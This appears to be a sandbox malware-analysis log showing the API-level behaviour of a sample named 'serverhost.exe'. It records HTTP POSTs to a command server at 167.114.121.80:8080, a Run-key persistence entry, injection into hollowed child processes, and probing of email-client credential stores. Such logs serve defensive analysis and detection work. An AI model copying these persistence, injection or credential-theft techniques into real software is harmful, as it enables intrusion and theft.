| System | Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe, base_address = 0xc40000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MA991ED3B |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x77140000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x755b0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74af0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74180000 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, type = size |
|
1 | |
| Module | Unmap | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| Mutex | Create | mutex_name = Global\I78B95E2E |
|
1 | |
| Mutex | Create | mutex_name = Global\M78B95E2E |
|
1 | |
| Mutex | Release | mutex_name = Global\I78B95E2E |
|
1 | |
| System | Get Time | type = Ticks, time = 110292 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 111306 |
|
1 | |
| System | Get Time | type = Ticks, time = 112305 |
|
1 | |
| System | Get Time | type = Ticks, time = 113303 |
|
1 | |
| System | Get Time | type = Ticks, time = 114301 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = 0 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 444196, size_out = 444196 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = 0 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 116813 |
|
1 | |
| System | Get Time | type = Ticks, time = 117094 |
|
3 | |
| System | Get Time | type = Ticks, time = 117172 |
|
1 | |
| System | Get Time | type = Ticks, time = 117297 |
|
1 | |
| System | Get Time | type = Ticks, time = 118092 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp", os_pid = 0xc50, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp", address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 |
|
1 | |
| Memory | Allocate | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Thread | Get Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, os_tid = 0xc20 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp", address = 0x400000, size = 114688 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp", address = 0x7ffdf008, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, os_tid = 0xc20 |
|
1 | |
| Thread | Resume | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, os_tid = 0xc20 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 118201 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp", os_pid = 0xc64, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp", address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 |
|
1 | |
| Memory | Allocate | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 372736 |
|
1 | |
| Thread | Get Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, os_tid = 0xc24 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp", address = 0x400000, size = 372736 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp", address = 0x7ffd4008, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, os_tid = 0xc24 |
|
1 | |
| Thread | Resume | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, os_tid = 0xc24 |
|
1 | |
| System | Get Time | type = Ticks, time = 121290 |
|
1 | |
| System | Get Time | type = Ticks, time = 121306 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 115300 |
|
1 | |
| System | Get Time | type = Ticks, time = 116298 |
|
1 | |
| System | Get Time | type = Ticks, time = 118139 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Process | Create | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp", os_pid = 0xc58, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Memory | Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp", address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 |
|
1 | |
| Memory | Allocate | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp", address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 102400 |
|
1 | |
| Thread | Get Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, os_tid = 0xc30 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp", address = 0x400000, size = 102400 |
|
1 | |
| Memory | Write | process_name = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp", address = 0x7ffdd008, size = 4 |
|
1 | |
| Thread | Set Context | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, os_tid = 0xc30 |
|
1 | |
| Thread | Resume | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, os_tid = 0xc30 |
|
1 | |
| System | Get Time | type = Ticks, time = 120027 |
|
1 | |
| System | Get Time | type = Ticks, time = 120136 |
|
3 | |
| System | Get Time | type = Ticks, time = 120167 |
|
1 | |
| System | Get Time | type = Ticks, time = 120323 |
|
1 | |
| System | Get Time | type = Ticks, time = 121087 |
|
3 | |
| System | Get Time | type = Ticks, time = 121165 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x755b0000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74af0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74180000 |
|
1 | |
| File | Create Temp File | filename = C:\ProgramData\C570.tmp, path = C:\ProgramData, prefix = 0 |
|
1 | |
| File | Delete | filename = C:\ProgramData\C570.tmp |
|
1 | |
| System | Get Time | type = Ticks, time = 116080 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x755b0000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74af0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74180000 |
|
1 | |
| File | Create Temp File | filename = C:\ProgramData\C571.tmp, path = C:\ProgramData, prefix = 0 |
|
1 | |
| File | Delete | filename = C:\ProgramData\C571.tmp |
|
1 | |
| System | Get Time | type = Ticks, time = 116080 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x755b0000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74af0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74180000 |
|
1 | |
| File | Create Temp File | filename = C:\ProgramData\C572.tmp, path = C:\ProgramData, prefix = 0 |
|
1 | |
| File | Delete | filename = C:\ProgramData\C572.tmp |
|
1 | |
| System | Get Time | type = Ticks, time = 116080 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = advapi32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Load | module_name = mpr.dll, base_address = 0x71dd0000 |
|
1 | |
| Module | Load | module_name = netapi32.dll, base_address = 0x73e90000 |
|
1 | |
| Module | Load | module_name = SAMCLI.DLL, base_address = 0x734e0000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x74af0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x74180000 |
|
1 | |
| System | Get Time | type = Ticks, time = 116158 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 118233 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 118373 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 119106 |
|
3 | |
| System | Get Time | type = Ticks, time = 119169 |
|
1 | |
| System | Get Time | type = Ticks, time = 119293 |
|
1 |
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:00 |
| Information | Value |
|---|---|
| PID | 0xc50 |
| Parent PID | 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C54
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc20 | address = 0x400000, size = 114688 |
|
1 | |
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc20 | address = 0x7ffdf008, size = 4 |
|
1 | |
| Modify Control Flow | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc20 | os_tid = 0xc54, address = 0x0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = private_0x0000000000400000, base_address = 0x400000 |
|
2 | |
| Module | Load | module_name = comctl32.dll, base_address = 0x6eb50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x6eb56be6 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x758a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shell32.dll, function = SHGetSpecialFolderPathA, address_out = 0x75aefb26 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost_lng.ini, type = file_attributes |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Profiles, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Thunderbird\Profiles, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Thunderbird, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = AddExportHeaderLine, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = WinPos |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = Columns |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg, section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| Module | Load | module_name = pstorec.dll, base_address = 0x71ec0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\pstorec.dll, function = PStoreCreateInstance, address_out = 0x71ec526c |
|
1 |
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:00 |
| Information | Value |
|---|---|
| PID | 0xc58 |
| Parent PID | 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C5C
0x
C8C
0x
C90
0x
C94
0x
C98
0x
C9C
0x
CA8
0x
CAC
0x
CB0
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc30 | address = 0x400000, size = 102400 |
|
1 | |
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc30 | address = 0x7ffdd008, size = 4 |
|
1 | |
| Modify Control Flow | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc30 | os_tid = 0xc5c, address = 0x0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2017-10-12 10:39:22 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x765e418d |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x765e1f61 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x765e1e16 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x765e76e6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x765e3879 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateEventExW, address_out = 0x765924d8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x765c2111 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x765d2510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x765cb009 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x772c89be |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x772bc02a |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x772bc0d2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x765c3f78 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadpoolWait, address_out = 0x772c8bfb |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x772bb567 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x772e5998 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x772b2251 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x772b28f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x765c2004 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76619aa9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7661f3cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CompareStringEx, address_out = 0x765eebc6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetDateFormatEx, address_out = 0x7662f29f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x765c53a5 |
|
1 | |
